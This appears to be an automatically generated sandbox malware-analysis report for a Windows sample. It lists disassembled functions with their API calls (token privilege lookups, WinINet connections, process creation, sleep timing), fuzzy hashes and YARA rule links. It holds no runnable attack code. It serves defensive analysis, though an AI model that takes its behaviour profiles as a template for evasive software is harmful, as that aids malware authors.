                                                                                                                              • Part of subcall function 00F3810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F38157
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F386A3
                                                                                                                            • _memcmp.LIBCMT ref: 00F386C6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F386FC
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00F38703
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1592001646-0
                                                                                                                            • Opcode ID: 3f828f7b3e70be0e7f1eb01c72c908bc3ed2752b345784a48d7f219e07b693a6
                                                                                                                            • Instruction ID: 01200ab262854589fa3f4e42533ce48f6760fdf6c44ad288d44932e25f7508a1
                                                                                                                            • Opcode Fuzzy Hash: 3f828f7b3e70be0e7f1eb01c72c908bc3ed2752b345784a48d7f219e07b693a6
                                                                                                                            • Instruction Fuzzy Hash: 6F21C171E00209EFDB00DFA4C949BEEB7B8FF41364F144059E414A7241DB34AE0AEB50
                                                                                                                            Function 00F0098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __setmode.LIBCMT ref: 00F009AE
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F47896,?,?,00000000), ref: 00EE5A2C
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F47896,?,?,00000000,?,?), ref: 00EE5A50
                                                                                                                            • _fprintf.LIBCMT ref: 00F009E5
                                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 00F35DBB
                                                                                                                              • Part of subcall function 00F04AAA: _flsall.LIBCMT ref: 00F04AC3
                                                                                                                            • __setmode.LIBCMT ref: 00F00A1A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 521402451-0
                                                                                                                            • Opcode ID: a912ef6553cff604a22c092d11a2c46b2c64f565f4a0954d12b76916879433d9
                                                                                                                            • Instruction ID: 85a441b6326240ad3a3790109d60117d1a2d5730a7137b73f4cde67e62f6eb04
                                                                                                                            • Opcode Fuzzy Hash: a912ef6553cff604a22c092d11a2c46b2c64f565f4a0954d12b76916879433d9
                                                                                                                            • Instruction Fuzzy Hash: BF1127B2A042486FD704B6B59C46ABEBBE99F41320F140015F204661D2EE296846B7A5
                                                                                                                            Function 00F51767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F517A3
                                                                                                                              • Part of subcall function 00F5182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F5184C
                                                                                                                              • Part of subcall function 00F5182D: InternetCloseHandle.WININET(00000000), ref: 00F518E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1463438336-0
                                                                                                                            • Opcode ID: 038ee64889fa3471cb9b4f06adeadb2059353fef44149983cea70ac551a6e9d7
                                                                                                                            • Instruction ID: af4437ec69d2874041c4cb9d653068e99d06733b1e5a74af7aff44bb752619e6
                                                                                                                            • Opcode Fuzzy Hash: 038ee64889fa3471cb9b4f06adeadb2059353fef44149983cea70ac551a6e9d7
                                                                                                                            • Instruction Fuzzy Hash: C621D736600605BFEB229F60DC00F7ABBA9FF49712F104129FF1196550D771A819B790
                                                                                                                            Function 00F43A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNEL32(?,00F6FAC0), ref: 00F43A64
                                                                                                                            • GetLastError.KERNEL32 ref: 00F43A73
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F43A82
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F6FAC0), ref: 00F43ADF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2267087916-0
                                                                                                                            • Opcode ID: 6ccdc7fdd4f706268ea6562f1641cd75d765b7eaae1cb02b478df3d48f09e76b
                                                                                                                            • Instruction ID: b50766b4cfcffc51e6b3d307f3e49a8193d1193c280a9210c6d7ef36b1335cab
                                                                                                                            • Opcode Fuzzy Hash: 6ccdc7fdd4f706268ea6562f1641cd75d765b7eaae1cb02b478df3d48f09e76b
                                                                                                                            • Instruction Fuzzy Hash: 2621D6755482058FC300EF24D88186A7BE4FE55364F104A1DF8E9C72A1D735DE09DB42
                                                                                                                            Function 00F3DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F3F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F3DCD3,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?), ref: 00F3F0CB
                                                                                                                              • Part of subcall function 00F3F0BC: lstrcpyW.KERNEL32(00000000,?,?,00F3DCD3,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3F0F1
                                                                                                                              • Part of subcall function 00F3F0BC: lstrcmpiW.KERNEL32(00000000,?,00F3DCD3,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?), ref: 00F3F122
                                                                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3DCEC
                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3DD12
                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F3EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00F3DD46
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                            • String ID: cdecl
                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                            • Opcode ID: b36e717f35aa9607b6ea46edc3e0bb50090486da5368de7623ada96166a95f80
                                                                                                                            • Instruction ID: c5f6bc22574ec9e6dc841419f9887eb91ace7e5f95931b963477caba6debe738
                                                                                                                            • Opcode Fuzzy Hash: b36e717f35aa9607b6ea46edc3e0bb50090486da5368de7623ada96166a95f80
                                                                                                                            • Instruction Fuzzy Hash: 1F11B136600305EBCB25AF34EC4597A77A9FF46360F80502AE806CB2A0EB71DC40E791
                                                                                                                            Function 00F150E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00F15101
                                                                                                                              • Part of subcall function 00F0571C: __FF_MSGBANNER.LIBCMT ref: 00F05733
                                                                                                                              • Part of subcall function 00F0571C: __NMSG_WRITE.LIBCMT ref: 00F0573A
                                                                                                                              • Part of subcall function 00F0571C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00F00DD3,?), ref: 00F0575F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 614378929-0
                                                                                                                            • Opcode ID: 95fdfb9dcfd4d88521c7cca40f0bc59673b76dc842e5524d90924c956727e30c
                                                                                                                            • Instruction ID: dddf2b65a9700313d9de8b0c1b27a02cc91fb84fddac4bea5357f375f4032b20
                                                                                                                            • Opcode Fuzzy Hash: 95fdfb9dcfd4d88521c7cca40f0bc59673b76dc842e5524d90924c956727e30c
                                                                                                                            • Instruction Fuzzy Hash: CB11E7B2900A15FECF222F74BC4679E37986B957B1B100529F944A62A0DE388881BB90
                                                                                                                            Function 00F56369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F47896,?,?,00000000), ref: 00EE5A2C
                                                                                                                              • Part of subcall function 00EE5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F47896,?,?,00000000,?,?), ref: 00EE5A50
                                                                                                                            • gethostbyname.WSOCK32(?,?,?), ref: 00F56399
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00F563A4
                                                                                                                            • _memmove.LIBCMT ref: 00F563D1
                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00F563DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1504782959-0
                                                                                                                            • Opcode ID: da69b85c71ea2af7c8e0673070f146530c29eeaf50b7ef745ce5946b92bd11d7
                                                                                                                            • Instruction ID: 48221eae1b3e93f9557bec607245ada778784d0717cdf28631e4d4f3e1799e19
                                                                                                                            • Opcode Fuzzy Hash: da69b85c71ea2af7c8e0673070f146530c29eeaf50b7ef745ce5946b92bd11d7
                                                                                                                            • Instruction Fuzzy Hash: 1D116A32900109AFCB00FBA5ED46CEEB7F8AF04314B044075F915B7262DB30AE08EBA1
                                                                                                                            Function 00F38B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F38B61
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F38B73
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F38B89
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F38BA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: 8ca62ea2c289bb88ad62b43121999c62c1e1c3ac701c86a44105e76a7d8c1f09
                                                                                                                            • Instruction ID: 38e98c53ec71c897854235c19d7ad3fd21347acaef47525621eb6086d12fb55a
                                                                                                                            • Opcode Fuzzy Hash: 8ca62ea2c289bb88ad62b43121999c62c1e1c3ac701c86a44105e76a7d8c1f09
                                                                                                                            • Instruction Fuzzy Hash: FD113A79900219FFDB11DB95CC84F9DFB78FB48350F204095E900B7250DA716E11EB94
                                                                                                                            Function 00EE1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 00EE12D8
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00F1B5FB
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F1B605
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F1B610
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4127811313-0
                                                                                                                            • Opcode ID: f7ba05a8f018e85b60fc33cc0c8b73d05b93b18bb0cd7336fd30a0475ab2c4d2
                                                                                                                            • Instruction ID: cdb8dcba1258c350003951cc6682bf9bd49eb1acdde066e844455f82f5d69d9c
                                                                                                                            • Opcode Fuzzy Hash: f7ba05a8f018e85b60fc33cc0c8b73d05b93b18bb0cd7336fd30a0475ab2c4d2
                                                                                                                            • Instruction Fuzzy Hash: E211283590005DEBCB00DFA9DC859EE77B8FB09301F400495FA12E7151C770AA95ABA5
                                                                                                                            Function 00F41142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F4115F
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F41184
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F4118E
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00F3FCED,?,00F40D40,?,00008000), ref: 00F411C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2875609808-0
                                                                                                                            • Opcode ID: d2d4f1c9551e3eae97817ab7bfe8b271923cfedfa28c6274beac5b0a7f3f7fde
                                                                                                                            • Instruction ID: 7242d645a119212ef22dba4d7f773872f9b0d6e664e1a64cc6241c15f7dc8138
                                                                                                                            • Opcode Fuzzy Hash: d2d4f1c9551e3eae97817ab7bfe8b271923cfedfa28c6274beac5b0a7f3f7fde
                                                                                                                            • Instruction Fuzzy Hash: A8114832C0051DD7CF009FA4E848AEEBF78FB4A751F104055EE50B2280DB709594ABA1
                                                                                                                            Function 00F3D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F3D84D
                                                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F3D864
                                                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F3D879
                                                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00F3D897
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352324309-0
                                                                                                                            • Opcode ID: fea50a25e3477693882add478e98c2141257e891b59410c5d6e34873e0f6cf0d
                                                                                                                            • Instruction ID: 93fdce0e207df5ce7b1562cf0370d493109126e183dd966d95793f346f0aba7b
                                                                                                                            • Opcode Fuzzy Hash: fea50a25e3477693882add478e98c2141257e891b59410c5d6e34873e0f6cf0d
                                                                                                                            • Instruction Fuzzy Hash: B0115E75A05304DBE3208F51FC48F92BBBCEB00B20F108569E916D7490D7F0F549ABA1
                                                                                                                            Function 00F16FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction ID: 381e7ebb3a13da18f42ab26a3393250a14447ded476daf72f184a7c0b4d26722
                                                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction Fuzzy Hash: AA01397644824ABBCF166E84CC058EE3F72BB1C3A0B598415FA1C58031D336DAB1BB81
                                                                                                                            Function 00F6B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00F6B2E4
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F6B2FC
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00F6B320
                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F6B33B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 357397906-0
                                                                                                                            • Opcode ID: 73a817bb37679ba79bb93eb9733faaae8302f070208d9e7284ebccc26978c8ce
                                                                                                                            • Instruction ID: dee2bbe7d7c69a08efb5bf40787f6a793c5c064ad5d620ef3a77649a1734eb5e
                                                                                                                            • Opcode Fuzzy Hash: 73a817bb37679ba79bb93eb9733faaae8302f070208d9e7284ebccc26978c8ce
                                                                                                                            • Instruction Fuzzy Hash: 14114675D0020DEFDB41CF99D4449EEBBB5FB08310F104166E924E3220D775AA659F50
                                                                                                                            Function 00F6B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F6B644
                                                                                                                            • _memset.LIBCMT ref: 00F6B653
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FA6F20,00FA6F64), ref: 00F6B682
                                                                                                                            • CloseHandle.KERNEL32 ref: 00F6B694
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
